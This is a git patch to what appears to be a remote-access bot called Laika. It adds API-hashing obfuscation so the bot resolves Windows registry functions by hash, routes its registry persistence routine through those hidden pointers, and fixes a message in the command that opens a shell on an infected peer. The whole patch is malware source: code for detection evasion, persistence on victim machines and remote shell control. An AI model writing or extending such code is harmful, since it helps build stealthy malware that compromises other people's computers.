From 25c18db6bca8cd1991002ea0a590068ddc7d90a4 Mon Sep 17 00:00:00 2001
From: CPunch <sethtstubbs@gmail.com>
Date: Tue, 12 Jul 2022 18:09:23 -0500
Subject: [PATCH] Bot: added Registry related API to laikaO_init()

- Also fixed misc. shell bug.
---
 bot/include/obf.h    |  8 ++++++++
 bot/win/winobf.c     | 19 ++++++++++---------
 bot/win/winpersist.c | 10 +++++-----
 shell/src/scmd.c     |  2 +-
 4 files changed, 24 insertions(+), 15 deletions(-)

diff --git a/bot/include/obf.h b/bot/include/obf.h
index 5e1c6e1..b2211ff 100644
--- a/bot/include/obf.h
+++ b/bot/include/obf.h
@@ -12,11 +12,19 @@ typedef HINSTANCE(WINAPI *_ShellExecuteA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR,
 typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, DWORD, HPCON *);
 typedef void(WINAPI *_ClosePseudoConsole)(HPCON);
 typedef BOOL(WINAPI *_CreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);
+typedef LSTATUS(WINAPI *_RegOpenKeyExA)(HKEY, LPCSTR, DWORD, REGSAM, PHKEY);
+typedef LSTATUS(WINAPI *_RegCloseKey)(HKEY);
+typedef LSTATUS(WINAPI *_RegSetValueExA)(HKEY, LPCSTR, DWORD, DWORD, const BYTE *, DWORD);
+typedef LSTATUS(WINAPI *_RegQueryValueExA)(HKEY, LPCSTR, LPDWORD, LPDWORD, LPBYTE, LPDWORD);
 
 extern _ShellExecuteA oShellExecuteA;
 extern _CreatePseudoConsole oCreatePseudoConsole;
 extern _ClosePseudoConsole oClosePseudoConsole;
 extern _CreateProcessA oCreateProcessA;
+extern _RegOpenKeyExA oRegOpenKeyExA;
+extern _RegCloseKey oRegCloseKey;
+extern _RegSetValueExA oRegSetValueExA;
+extern _RegQueryValueExA oRegQueryValueExA;
 #endif
 
 void laikaO_init();
diff --git a/bot/win/winobf.c b/bot/win/winobf.c
index 2500604..fb7a89e 100644
--- a/bot/win/winobf.c
+++ b/bot/win/winobf.c
@@ -8,6 +8,8 @@
 */
 
 #include <process.h>
+#include <shlobj.h>
+#include <shlwapi.h>
 #include <windows.h>
 
 /* ======================================[[ API Hashing ]]====================================== */
@@ -139,11 +141,13 @@ _ShellExecuteA oShellExecuteA;
 _CreatePseudoConsole oCreatePseudoConsole;
 _ClosePseudoConsole oClosePseudoConsole;
 _CreateProcessA oCreateProcessA;
+_RegOpenKeyExA oRegOpenKeyExA;
+_RegCloseKey oRegCloseKey;
+_RegSetValueExA oRegSetValueExA;
+_RegQueryValueExA oRegQueryValueExA;
 
 /* TODO:
     GetEnvironmentVariable
-
-    windows registry related API
 */
 
 void laikaO_init()
@@ -155,11 +159,8 @@ void laikaO_init()
     oCreatePseudoConsole = (_CreatePseudoConsole)findByHash("kernel32.dll", 0x7310ef7);
     oClosePseudoConsole = (_ClosePseudoConsole)findByHash("kernel32.dll", 0xeff42590);
     oCreateProcessA = (_CreateProcessA)findByHash("kernel32.dll", 0x9e687c1d);
-
-/*
-    hash = getHashName("InitializeProcThreadAttributeList");
-    printf("InitializeProcThreadAttributeList: real is %p, hashed is %p. [HASH: %x]\n",
-           (void *)InitializeProcThreadAttributeList,
-           findByHash("kernel32.dll", hash), hash);
-*/
+    oRegOpenKeyExA = (_RegOpenKeyExA)(findByHash("advapi32.dll", 0x15041404));
+    oRegCloseKey = (_RegCloseKey)(findByHash("advapi32.dll", 0xae0cf309));
+    oRegSetValueExA = (_RegSetValueExA)(findByHash("advapi32.dll", 0xcb91dcf7));
+    oRegQueryValueExA = (_RegQueryValueExA)(findByHash("advapi32.dll", 0x4298d735));
 }
\ No newline at end of file
diff --git a/bot/win/winpersist.c b/bot/win/winpersist.c
index 41f07c8..36d03a2 100644
--- a/bot/win/winpersist.c
+++ b/bot/win/winpersist.c
@@ -49,7 +49,7 @@ HKEY openReg(HKEY key, LPCSTR subKey)
 {
     HKEY hKey;
 
-    if (RegOpenKeyExA(key, subKey, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
+    if (oRegOpenKeyExA(key, subKey, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
         LAIKA_ERROR("Failed to open registry key!\n");
 
     return hKey;
@@ -63,12 +63,12 @@ LPSTR readReg(HKEY key, LPCSTR val, LPDWORD sz)
 
     /* get the size */
     *sz = 0;
-    RegQueryValueExA(key, val, NULL, NULL, NULL, sz);
+    oRegQueryValueExA(key, val, NULL, NULL, NULL, sz);
 
     if (*sz != 0) {
         str = (LPSTR)laikaM_malloc(*sz);
 
-        if ((ret = RegQueryValueExA(key, val, NULL, NULL, str, sz)) != ERROR_SUCCESS)
+        if ((ret = oRegQueryValueExA(key, val, NULL, NULL, str, sz)) != ERROR_SUCCESS)
             LAIKA_ERROR("Failed to read registry!\n");
     }
 
@@ -79,7 +79,7 @@ void writeReg(HKEY key, LPCSTR val, LPSTR data, DWORD sz)
 {
     LONG code;
 
-    if ((code = RegSetValueExA(key, val, 0, REG_SZ, (LPBYTE)data, sz)) != ERROR_SUCCESS)
+    if ((code = oRegSetValueExA(key, val, 0, REG_SZ, (LPBYTE)data, sz)) != ERROR_SUCCESS)
         LAIKA_ERROR("Failed to write registry!\n");
 }
 
@@ -190,7 +190,7 @@ void installRegistry()
         writeReg(reg, regKeyVal, newRegValue, newRegSz);
     }
 
-    RegCloseKey(reg);
+    oRegCloseKey(reg);
     LAIKA_BOX_SKID_END(regKeyVal);
     LAIKA_BOX_SKID_END(regKey);
 }
diff --git a/shell/src/scmd.c b/shell/src/scmd.c
index 4b86e9e..50e725f 100644
--- a/shell/src/scmd.c
+++ b/shell/src/scmd.c
@@ -84,7 +84,7 @@ void openShellCMD(tShell_client *client, int argc, char *argv[])
     id = shellS_readInt(argv[1]);
     peer = shellS_getPeer(client, id);
 
-    PRINTINFO("Opening shell on peer %04d...\n");
+    PRINTINFO("Opening shell on peer %04d...\n", id);
     PRINTINFO("Use CTRL+A to kill the shell\n");
 
     /* open shell on peer */